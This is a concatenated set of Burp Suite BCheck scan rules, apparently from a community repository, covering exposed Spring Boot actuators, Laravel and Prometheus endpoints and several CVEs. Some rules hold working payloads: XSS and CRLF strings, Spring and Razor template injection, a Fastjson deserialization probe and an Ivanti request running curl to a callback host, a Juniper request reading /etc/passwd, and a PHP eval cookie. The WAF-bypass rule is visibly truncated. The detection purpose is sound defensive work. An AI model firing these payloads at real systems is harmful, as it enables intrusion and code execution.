31 | end if -------------------------------------------------------------------------------- /other/Cloudflare External Image Resizing Misconfiguration.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Cloudflare External Image Resizing Misconfiguration" 4 | author: "Parimal Shaw" 5 | description: "Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin." 6 | tags: "Cloudflare Misconfiguration" 7 | 8 | define: 9 | potential_path = `/cdn-cgi/image/width/https://{generate_collaborator_address()}` 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | replacing headers: 16 | "Accept": "*/*" 17 | path: {potential_path} 18 | 19 | 20 | if http interactions then 21 | report issue: 22 | severity: info 23 | confidence: certain 24 | detail: "Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin." 25 | remediation: "Disable image Resizing from all origin or restrict it to certain doamins in Cloudflare." 26 | end if -------------------------------------------------------------------------------- /other/Rails CRLF and XSS.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Ruby on Rails - CRLF Injection and Cross-Site Scripting" 4 | author: "Parimal Shaw" 5 | description: "Ruby on Rails 6.0.0-6.0.3.1 contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting." 
6 | tags: "Rails CRLF and XSS" 7 | 8 | define: 9 | potential_path = "/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "POST" 15 | path: {potential_path} 16 | 17 | 18 | if {check.response.status_code} is "302" and "javascript:alert(1)" in {check.response.body} and "Location: aaaaa" in {check.response.headers} and "text/html" in {check.response.headers} then 19 | report issue: 20 | severity: medium 21 | confidence: certain 22 | detail: `Ruby on Rails 6.0.0-6.0.3.1 contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting.` 23 | remediation: "Ensure the location value is set as default value and XSS,CRLF payloads should be Blocked by application" 24 | end if -------------------------------------------------------------------------------- /other/exposed-laravel-clockwork.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Exposed Laravel Clockwork Endpoint" 4 | description: "A Laravel Clockwork php dev tools was discovered, which exposed cleartext HTTP request, responses, passwords, tokens and some information containing app secrets. 
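"
    author: "Yasin Yilmaz"
    tags: "laravel", "clockwork", "php"

run for each:
    potential_path =
        "/__clockwork/latest",
        "/_debugbar/clockwork/latest",
        "/public/clockwork/latest",
        "/public/__clockwork/latest"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # The three body markers are alternatives, so they are grouped in parentheses.
    # Without them the status-code test only guarded "jobQueue": any response at
    # all (e.g. an error page) containing "xdebug" or "webVitals" was reported as
    # a high/firm finding.
    if {check.response.status_code} is "200" and ("jobQueue" in {check.response.body} or "xdebug" in {check.response.body} or "webVitals" in {check.response.body}) then
        report issue:
            severity: high
            confidence: firm
            detail: `A Laravel Clockwork php dev tools was discovered at {potential_path}, which exposed cleartext HTTP request, responses, passwords, tokens and some information containing app secrets.`
            remediation: "The instance of Laravel Clockwork should be restricted."
    end if

--------------------------------------------------------------------------------
/other/springboot/Springboot health actuator.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v1-beta
    name: "Springboot health actuator"
    description: "Springboot health actuator exposed"
    author: "Mateusz Dabrowski (dbrwsky)"
    tags: "actuator", "springboot", "exposure", "informative"

run for each:
    potential_path =
        "/health",
        "/actuator/health"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Both JSON keys must be present together with a JSON or Spring actuator
    # content type before the endpoint is reported.
    if {check.response.status_code} is "200"
        and "\"status\"" in {check.response.body}
        and "\"diskSpace\"" in {check.response.body}
        and ("application/json" in {check.response.headers}
            or "application/vnd.spring-boot.actuator" in {check.response.headers}
            or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers}
            or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers}
            or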
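"application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then
        report issue:
            severity: low
            confidence: certain
            detail: `Springboot health actuator found at {potential_path}.`
            remediation: "Ensure health actuator is not exposed."
    end if
--------------------------------------------------------------------------------
/vulnerabilities-CVEd/CVE-2017-4971-spring_webflow_rce.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v1-beta
    name: "CVE-2017-4971 Spring WebFlow RCE"
    description: "Spring WebFlow RCE CVE-2017-4971"
    author: "timeshatter"
    # Tag corrected: it was truncated to "CVE-2017-497", which does not match
    # the CVE id used in the name and description above.
    tags: "Spring WebFlow", "CVE-2017-4971"

define:
    # The expression only asks the container to add a marker response header, so
    # a match on "vuln: True" shows the input was evaluated without any other
    # effect on the target.
    payload = "&_T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader(\"vuln\",\"True\").aaa=aaa"
    answer = "vuln: True"

given request then
    # The same payload is tried as a query parameter and as a body parameter;
    # {checkN.response} (the whole response, headers included) is searched, which
    # is where the marker header lands.
    send request called check1:
        method: "GET"
        appending queries: {payload}

    if {answer} in {check1.response} then
        report issue:
            severity: high
            confidence: certain
            detail: "find Spring WebFlow RCE CVE-2017-4971"
            remediation: "update Spring WebFlow to last."
    end if

    send request called check2:
        method: "POST"
        appending body: {payload}

    if {answer} in {check2.response} then
        report issue:
            severity: high
            confidence: certain
            detail: "find Spring WebFlow RCE CVE-2017-4971"
            remediation: "update Spring WebFlow to last."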
35 | end if 36 | -------------------------------------------------------------------------------- /other/springboot/Springboot loggers actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot loggers actuator" 4 | description: "Springboot loggers actuator exposed" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/loggers", 11 | "/actuator/loggers" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"loggers\"" in {check.response.body} 20 | and "\"levels\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot loggers actuator found at {potential_path}.` 30 | remediation: "Ensure loggers actuator is not exposed." 
31 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-38035 - Ivanti Sentry - Auth Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2023-38035 - Ivanti Sentry - Auth Bypass" 4 | description: "Checks for CVE-2023-38035" 5 | author: "Dolph Flynn" 6 | tags: "CVE-2023-38035", "ivanti", "mobileiron", "OAST" 7 | 8 | 9 | define: 10 | collatorator_payload = `{generate_collaborator_address()}/?{random_str(123)}` 11 | trimmed_collaborator_payload = `{regex_replace ({collatorator_payload}, "(?<=^.{71}).*" , "")}` # trims payload to 71 characters! 12 | 13 | 14 | given host then 15 | send request called check: 16 | `POST /mics/services/MICSLogService HTTP/1.1 17 | Host: {base.request.url.host} 18 | User-Agent: {user_agent} 19 | Connection: close 20 | Content-Length: 133 21 | Content-Type: application/json 22 | 23 | {base64_decode("YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=")}curl {trimmed_collaborator_payload}{base64_decode("UwAGaXNSb290VHpOeg==")}` 24 | 25 | if {check.response.status_code} is "200" and "isRunningTzz" in {check.response.body} and dns interactions then 26 | 27 | report issue: 28 | severity: high 29 | confidence: certain 30 | detail: "Ivanti Sentry - Authentication Bypass." 31 | 32 | end if 33 | 34 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-5244-Microweber less than V.2.0-Cross-Site-Scripting.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2023-5244 - Microweber < V.2.0 - Cross-Site Scripting" 4 | description: "Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint." 
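author: "Nithissh"

run for each:
    # you could add more values to this list to make the check repeat
    potential_path =
        "/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # The reflected value is looked for in the response body; the original tested
    # the response headers, where a page-level reflection cannot appear, so the
    # check could not fire. The status test uses `is` like the sibling checks.
    # The "microweber" fingerprint is left on the headers as written — it may
    # belong on the body too; confirm against a known-vulnerable instance.
    if {check.response.status_code} is "200" and "text/html" in {check.response.headers}
        and "alert(document.domain)" in {check.response.body}
        and "microweber" in {check.response.headers} then
        report issue:
            severity: medium
            confidence: certain
            detail: `Reflected XSS found at {potential_path}.`
            remediation: "Upgrade to the latest version and for reference: https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470"
    end if

--------------------------------------------------------------------------------
/other/OAuth/OpenID-Dynamic-Client-Registration-Endpoint-Detected.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v2-beta
    name: "OpenID Connect Dynamic Registration Endpoint Detected"
    author: "Machiavelli"
    description: "Actively checks if the OpenID Connect configuration endpoint (/.well-known/openid-configuration) exists and exposes a 'registration_endpoint', indicating dynamic client registration support."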
6 | tags: "OpenID Connect", "active" 7 | 8 | define: 9 | config_endpoint = "/.well-known/openid-configuration" 10 | 11 | given host then 12 | send request called config_check: 13 | method: "GET" 14 | path: {config_endpoint} 15 | if {config_check.response.status_code} is "200" 16 | and "\"registration_endpoint\":" in {config_check.response.body} then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "The OpenID Connect configuration endpoint (/.well-known/openid-configuration) is accessible and includes a 'registration_endpoint' field, indicating support for dynamic client registration, potential SSRF, check https://portswigger.net/research/hidden-oauth-attack-vectors." 21 | remediation: "Review the dynamic registration implementation for SSRF vulnerabilities and patch it." 22 | end if 23 | -------------------------------------------------------------------------------- /other/exposed-laravel-telescope.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Exposed Laravel Telescope Endpoint" 4 | description: "A Laravel Telescope was discovered, which exposed log files, requests and some information containing app secrets." 
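author: "Yasin Yilmaz"
    tags: "laravel", "telescope", "php"

run for each:
    potential_path =
        "/telescope/requests",
        "/telescope/commands",
        "/telescope/logs",
        "/telescope",
        "/_debugbar/telescope/",
        "/public/telescope",
        "/en/public/telescope"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # The body markers are grouped so that the 200 status guards all of them; as
    # originally written, "Telescope" anywhere in any response (error pages
    # included) was enough for a high/firm report. Note that "Telescope" already
    # subsumes "Laravel Telescope", so the bare word is the effective (and weak)
    # marker — a lower confidence for that case may be warranted.
    if {check.response.status_code} is "200" and ("Laravel Telescope" in {check.response.body} or "/telescope/favicon.ico" in {check.response.body} or "Telescope" in {check.response.body}) then
        report issue:
            severity: high
            confidence: firm
            detail: `A Laravel Telescope was discovered at {potential_path}, which exposed log files, requests and some information containing app secrets. `
            remediation: "The instance of Laravel Telescope should be restricted."
    end if

--------------------------------------------------------------------------------
/vulnerability-classes/injection/SSTI-Razor.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v2-beta
    name: ".NET Razor SSTI Injection"
    description: "Inserts a .NET Razor SSTI payload into each parameter to detect suspicious input evaluation"
    author: "alp1n3.eth"
    tags: "active", "injection", "template", "template injection", "scan", "ssti", "razor"
    # reference 1: https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/
    # reference 2: https://www.schtech.co.uk/razor-pages-ssti-rce/


define:
    # 1337*1337 = 1787569: an arithmetic probe whose result is unlikely to occur
    # in a normal page, so a hit indicates evaluation rather than a plain echo.
    calculation = "@(1337*1337)"
    answer = "1787569"


given query or body insertion point then
    # Skip insertion points whose unmodified response already contains the
    # answer; otherwise the match below would be a guaranteed false positive.
    if not({answer} in {base.response}) then
        send payload:
            replacing: {calculation}

        if {answer} in {latest.response} then
            report issue:
                severity: high
                confidence: firm
                detail: "The application evaluates input in a way that 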
suggests it is vulnerable to ASP.NET Razor SSTI. This may potentially be escalated to achieving C# execution (RCE)." 26 | remediation: "Manual investigation is advised. Do not build templates dynamically from user-controlled data." 27 | 28 | end if 29 | end if 30 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.80-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.80 Deserialization RCE" 4 | description: "https://github.com/su18/hack-fastjson-1.2.80" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload =`[\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","x": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{generate_collaborator_address()}/{random_str(4)}"}}},\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","message": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{generate_collaborator_address()}/{random_str(4)}"}}}]` 10 | 11 | 12 | given request then 13 | 14 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 15 | send request: 16 | body: {payload} 17 | 18 | if dns interactions then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "If two DNS requests are received, it proves version 1.2.83 is used. If one DNS request is received, it proves version 1.2.80 is used.https://github.com/su18/hack-fastjson-1.2.80." 
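remediation: "Upgrade Fastjson to the latest release and enable safeMode so that autoType-based deserialization cannot be abused."
        end if
    end if
--------------------------------------------------------------------------------
/other/springboot/Springboot conditions actuator.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v1-beta
    name: "Springboot conditions actuator"
    description: "Springboot conditions actuator exposed"
    author: "Mateusz Dabrowski (dbrwsky)"
    tags: "actuator", "springboot", "exposure", "informative"

run for each:
    potential_path =
        "/conditions",
        "/actuator/conditions"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # Both JSON keys must be present together with a JSON or Spring actuator
    # content type before the endpoint is reported.
    if {check.response.status_code} is "200"
        and "\"positiveMatches\"" in {check.response.body}
        and "\"unconditionalClasses\"" in {check.response.body}
        and ("application/json" in {check.response.headers}
            or "application/vnd.spring-boot.actuator" in {check.response.headers}
            or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers}
            or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers}
            or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then
        report issue:
            severity: low
            confidence: certain
            detail: `Springboot conditions actuator found at {potential_path}.`
            remediation: "Ensure conditions actuator is not exposed."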
31 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot scheduledtasks actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot scheduledtasks actuator" 4 | description: "Springboot scheduledtasks actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/scheduledtasks", 11 | "/actuator/scheduledtasks" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"cron\"" in {check.response.body} 20 | and "\"fixedDelay\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot scheduledtasks actuator found at {potential_path}.` 30 | remediation: "Ensure scheduledtasks actuator is not exposed" 31 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot threaddump actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot threaddump actuator" 4 | description: "Springboot threaddump actuator provides a thread dump from the application's JVM" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | 
potential_path = 10 | "/threaddump", 11 | "/actuator/threaddump" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"threads\":" in {check.response.body} 20 | and "\"threadName\":" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot threaddump actuator found at {potential_path}.` 30 | remediation: "Ensure threaddump actuator is not exposed." 31 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot env actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot env actuator" 4 | description: "Springboot env actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/env", 11 | "/actuator/env" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and ("applicationConfig" in {check.response.body} or "activeProfiles" in {check.response.body}) 20 | and "server.port" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or 
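"application/vnd.spring-boot.actuator.v2+json" in {check.response.headers}
            or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then
        report issue:
            severity: low
            confidence: certain
            detail: `Springboot env actuator found at {potential_path}.`
            remediation: "Ensure env actuator is not exposed or doesn't contain sensitive information."
    end if
--------------------------------------------------------------------------------
/other/prometheus/exposed-prometheus-api-endpoints.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v1-beta
    name: "Exposed Prometheus API Endpoints"
    description: "Check for exposed Prometheus Config, Flags and Targets API endpoints."
    author: "@nightshiba"

run for each:
    # Prometheus API endpoints: https://prometheus.io/docs/prometheus/latest/querying/api/ and https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
    potential_path =
        "/api/v1/status/config",
        "/api/v1/status/flags",
        "/api/v1/targets"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    # The status regex tolerates optional whitespace around the colon: the API
    # typically serialises compact JSON ("status":"success"), which the original
    # pattern with a literal space after the colon would not match.
    # The detail string uses backticks so {potential_path} is interpolated; in
    # the original double-quoted string it was emitted literally.
    if {check.response.status_code} is "200"
        and {check.response.body} matches "\"status\"\s*:\s*\"success\""
        and {check.response.body} matches "\"data\":"
        and {check.response.headers} matches "application/json" then
        report issue:
            severity: info
            confidence: certain
            detail: `The Prometheus API endpoint at {potential_path} is exposed publicly and could disclose sensitive information about the application's configuration, flags or targets.`
            remediation: "Ensure that the Prometheus API endpoints are not publicly accessible and are properly secured."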
28 | end if 29 | -------------------------------------------------------------------------------- /other/prometheus/exposed-generic-prometheus-metrics.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Exposed Generic Prometheus Metrics" 4 | description: "Check for information disclosure from any exporter" 5 | author: "@nightshiba" 6 | 7 | run for each: 8 | # Prometheus metrics most popular endpoints, you can add some more organization-specific 9 | potential_path = 10 | "/metrics", # default 11 | "/sys/metrics", # hashicorp vault 12 | "/monitoring/prometheus", 13 | "/pro/metrics" 14 | 15 | given host then 16 | send request called check: 17 | method: "GET" 18 | path: {potential_path} 19 | 20 | # format specification: https://prometheus.io/docs/concepts/data_model/ and https://prometheus.io/docs/instrumenting/exposition_formats/#text-based-format 21 | if {check.response.status_code} is "200" 22 | and {check.response.body} matches "((# (HELP|TYPE) .*)|([a-zA-Z_:][a-zA-Z0-9_:]*(\{([a-zA-Z_][a-zA-Z0-9_]*=.*(,\s)?)+\})?\s+.*))" 23 | and {check.response.headers} matches "text/plain" then 24 | report issue: 25 | severity: low 26 | confidence: certain 27 | detail: `Prometheus metrics exposed at {potential_path}.` 28 | remediation: "Ensure your Prometheus metrics are not accessible outside of the monitoring stack." 
29 | end if 30 | -------------------------------------------------------------------------------- /other/bypass/waf-bypass.bcheck: -------------------------------------------------------------------------------- 1 | #Verified: Yes 2 | metadata: 3 | language: v1-beta 4 | name: "WAF-bypass" 5 | description: "Use different payloads to try to bypass the WAF or get an idea of how it can be bypassed" 6 | author: "Brumens" 7 | tags: "waf", "firewall", "bypass" 8 | 9 | define: 10 | param = "dummyparam" 11 | trackHeader = "X-BCheck" 12 | trackValue = "waf-bypass" 13 | 14 | run for each: 15 | payload = 16 | " 4.2.8" 31 | end if 32 | 33 | end if 34 | -------------------------------------------------------------------------------- /other/springboot/Springboot trace actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot trace actuator" 4 | description: "Springboot trace actuator displays trace information (by default the last few HTTP requests)." 
5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/trace", 11 | "/actuator/trace", 12 | "/httptrace", 13 | "/actuator/httptrace" 14 | 15 | 16 | given host then 17 | send request called check: 18 | method: "GET" 19 | path: {potential_path} 20 | 21 | if {check.response.status_code} is "200" 22 | and "\"timestamp\"" in {check.response.body} 23 | and "\"info\"" in {check.response.body} 24 | and "\"method\"" in {check.response.body} 25 | and "\"path\"" in {check.response.body} 26 | and ("application/json" in {check.response.headers} 27 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 28 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 29 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 30 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 31 | report issue: 32 | severity: low 33 | confidence: certain 34 | detail: `Springboot trace actuator found at {potential_path}.` 35 | end if -------------------------------------------------------------------------------- /other/csrf_magic_backdoor.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CSRF-Magic backdoor detected" 4 | description: "Tests if code for the CSRF-Magic backdoor is triggered. " 5 | author: "MOGWAI LABS GmbH" 6 | 7 | given path then 8 | send request called check: 9 | method: "GET" 10 | replacing headers: 11 | "Cookie": "a=ab;b=;c=ZWNobyAiY3NyZi1tYWdpYyI7Ly8=;d=;" 12 | 13 | if "csrf-magic" in {check.response.body} then 14 | report issue: 15 | severity: high 16 | confidence: firm 17 | detail: `CSRF-Magic cookie backdoor was discovered. 
18 | 19 | This backdoor was present in old versions of the CSRF-magic library 20 | and allows an unauthenticated attacker to evaluate arbitrary PHP code by setting malicious cookies. 21 | 22 | * The vulnerable code can be found here: https://web.archive.org/web/20220325023755/https://github.com/csrf-magic/csrf-magic/blob/master/csrf-magic.php 23 | * A writeup for the vulnerabilty can be found here: https://www.labs.greynoise.io/grimoire/2024-02-what-is-this-old-ivanti-exploit/index.html 24 | * A real-world example where this backdoor was expliotable: https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US 25 | ` 26 | remediation: "Ensure you remove the backdoored code from the csrf-magic.php file and investigate the server for indicators of compromise." 27 | end if 28 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2025-5777 - CitrixBleed 2.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "[CVE-2025-5777] Citrix Netscaler CitrixBleed 2" 4 | description: "This rule checks if the remote host is vulnerable to CVE-2025-5777 - CitrixBleed 2" 5 | author: "Felipe Molina (@felmoltor)" 6 | tags: "CVE-2025-5777","citrix","netscaler","leak" 7 | 8 | define: 9 | login_path = 10 | "/p/u/doAuthentication.do" 11 | 12 | given host then 13 | send request called check_leak: 14 | method: "POST" 15 | path: {login_path} 16 | body: "login" 17 | 18 | if {check_leak.response.body} matches "([^<]+)([^<>]*)" then 19 | report issue: 20 | severity: high 21 | confidence: firm 22 | detail: " 23 | The remote server responded with a non-empty string within the node upon a login request. 24 | This may indicate the server is prone to a memory leak which could disclose sensitive information stored in the memory of the device. 
25 | For further information, refer to: 26 | * https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ 27 | " 28 | remediation: "Refer to: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420" 29 | 30 | end if 31 | 32 | -------------------------------------------------------------------------------- /other/springboot/Springboot autoconfig actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot autoconfig actuator" 4 | description: "Springboot autoconfig actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/autoconfig", 11 | "/actuator/autoconfig" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"positiveMatches\"" in {check.response.body} 20 | and "\"AuditAutoConfiguration#auditListener\"" in {check.response.body} 21 | and "\"EndpointAutoConfiguration#beansEndpoint\"" in {check.response.body} 22 | and ("application/json" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 26 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 27 | report issue: 28 | severity: low 29 | confidence: certain 30 | detail: `Springboot autoconfig actuator found at {potential_path}.` 31 | remediation: "Ensure autoconfig is not exposed." 
32 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot configprops actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot configprops actuator" 4 | description: "Springboot configprops actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/configprops", 11 | "/actuator/configprops" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "org.springframework.boot.actuate" in {check.response.body} 20 | and "\"beans\"" in {check.response.body} 21 | and "\"contexts\"" in {check.response.body} 22 | and ("application/json" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 26 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 27 | report issue: 28 | severity: low 29 | confidence: certain 30 | detail: `Springboot configprops actuator found at {potential_path}.` 31 | remediation: "Ensure configprops is not exposed or doesn't contain sensitive information." 
32 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-36845 Juniper Networks - PHP External Variable Modification.bcheck: -------------------------------------------------------------------------------- 1 | #https://vulncheck.com/blog/juniper-cve-2023-36845 2 | metadata: 3 | language: v1-beta 4 | name: "CVE-2023-36845 Juniper Networks - PHP External Variable Modification" 5 | author: "Joao Paulo Assis (j0hnZ3RA)" 6 | description: "Check for CVE-2023-36845." 7 | tags: "CVE-2023-36845" 8 | 9 | define: 10 | target_path = "/?PHPRC=/dev/fd/0" 11 | 12 | given host then 13 | send request called check: 14 | method: "POST" 15 | replacing headers: 16 | "Content-Type": "application/x-www-form-urlencoded" 17 | path: {target_path} 18 | body: "auto_prepend_file=\"/etc/passwd\"" 19 | 20 | if {check.response.status_code} is "200" and "root" in {check.response.body} and "Juniper" in {check.response.body} then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: "A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code." 
